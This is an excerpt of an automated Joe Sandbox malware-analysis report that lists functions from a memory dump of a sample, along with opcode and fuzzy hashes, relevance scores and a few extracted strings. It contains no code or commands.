                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID:
                                            • API String ID: 3446177414-0
                                            • Opcode ID: 1188d3fe1e8a743bf1ce630a257742246acb09b43679c6f91b9a38ed53831380
                                            • Instruction ID: 09d2de6f6603475a73fd9fedeefca77302304431418d03a43c53be3bedeb4a35
                                            • Opcode Fuzzy Hash: 1188d3fe1e8a743bf1ce630a257742246acb09b43679c6f91b9a38ed53831380
                                            • Instruction Fuzzy Hash: E85135B5E00219EFEF04CF99C845ADDBBB5BF48394F24812AE905BB254D7349942CF51
                                            Function 36987B2F Relevance: 6.1, APIs: 4, Instructions: 81timethreadCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes$BaseInitThreadThunk
                                            • String ID:
                                            • API String ID: 4281723722-0
                                            • Opcode ID: 5bebcdb924dfb9c113c85adac5756f96fefef7c700afa31a0df705b8d3a86e92
                                            • Instruction ID: fa1bb17e1437e8b81905a623201cd8bacc18997f4a1a279ab240896cd3fee6a6
                                            • Opcode Fuzzy Hash: 5bebcdb924dfb9c113c85adac5756f96fefef7c700afa31a0df705b8d3a86e92
                                            • Instruction Fuzzy Hash: 08310275E042289FCF55DFA8D844A9DBBF1AB48720F20416AE512B7390DA359D02CF65
                                            Function 369559C0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @
                                            • API String ID: 0-2766056989
                                            • Opcode ID: 661e4b573d2b4f334b58f31ef87c0723119d8a0cc2e2e763bf5a8ef8e24226d1
                                            • Instruction ID: 39ccdac9979d89f408cc6f32a5bbd1322b9bc5b173113778a47e38baad38f37f
                                            • Opcode Fuzzy Hash: 661e4b573d2b4f334b58f31ef87c0723119d8a0cc2e2e763bf5a8ef8e24226d1
                                            • Instruction Fuzzy Hash: ED324770D04369DFEB21CF64C984BEDBBB4BB08314F1141EAD649A7252DB74AA84CF91
                                            Function 36997D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: __aulldvrm
                                            • String ID: +$-
                                            • API String ID: 1302938615-2137968064
                                            • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                            • Instruction ID: caf787970bd552e13920670eecb11ff58914a0d5962a8307344a4bcccf8ac74f
                                            • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                            • Instruction Fuzzy Hash: 9E91A374E0021A9FEB14CE6ACC896FEB7E9AF44769F70451AE854EB2D0EF308940D751
                                            Function 36984C59 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 0$Flst
                                            • API String ID: 0-758220159
                                            • Opcode ID: 65b611d196bd944cfa906caf0d57ba4456239f14efe2a8a6b6e1bebc50d3871c
                                            • Instruction ID: 6174d04d6fbb3a97584d84c2357fe596d6580d6856933956e3fbcab58e87a65f
                                            • Opcode Fuzzy Hash: 65b611d196bd944cfa906caf0d57ba4456239f14efe2a8a6b6e1bebc50d3871c
                                            • Instruction Fuzzy Hash: 8851BEB5E10358CFEB11CF99C884699FBF8EF44B98F35802AD009DB251EB70A945CB90
                                            Function 369504E5 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 153timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            • kLsE, xrefs: 36950540
                                            • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 3695063D
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                            • API String ID: 3446177414-2547482624
                                            • Opcode ID: 395c4c4d109a50d7f7567d2a98c73f535c14e9bcabfab7578f434bb8f6e1c289
                                            • Instruction ID: 8474dec89eccc6bef57098e3a978da4e90ce4060d1b66d8c44f023101973b6b7
                                            • Opcode Fuzzy Hash: 395c4c4d109a50d7f7567d2a98c73f535c14e9bcabfab7578f434bb8f6e1c289
                                            • Instruction Fuzzy Hash: E951D0B59157468FD324DF25C940697B7E8AF84304F22493EEADAC7241E730D586CF92
                                            Function 3694DF81 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2644672130.0000000036920000.00000040.00001000.00020000.00000000.sdmp, Offset: 36920000, based on PE: true
                                            • Associated: 00000009.00000002.2644672130.0000000036A49000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.2644672130.0000000036ABE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_36920000_Ntwph4urc1.jbxd
                                            Similarity
                                            • API ID: DebugPrintTimes
                                            • String ID: 0$0
                                            • API String ID: 3446177414-203156872
                                            • Opcode ID: 233d6665e6c25f597543345098c389a73ff8a856996c4734bcea95a29e2c0df3
                                            • Instruction ID: cb8d8c5b2929b148ec4c30d4932c9db08b1440a5058d57d1dd2f5ab9f7b3f239
                                            • Opcode Fuzzy Hash: 233d6665e6c25f597543345098c389a73ff8a856996c4734bcea95a29e2c0df3
                                            • Instruction Fuzzy Hash: 16419DB5A187059FD311CF29C984A5ABBE8BF8C318F14496EF488DB301D771E909CB96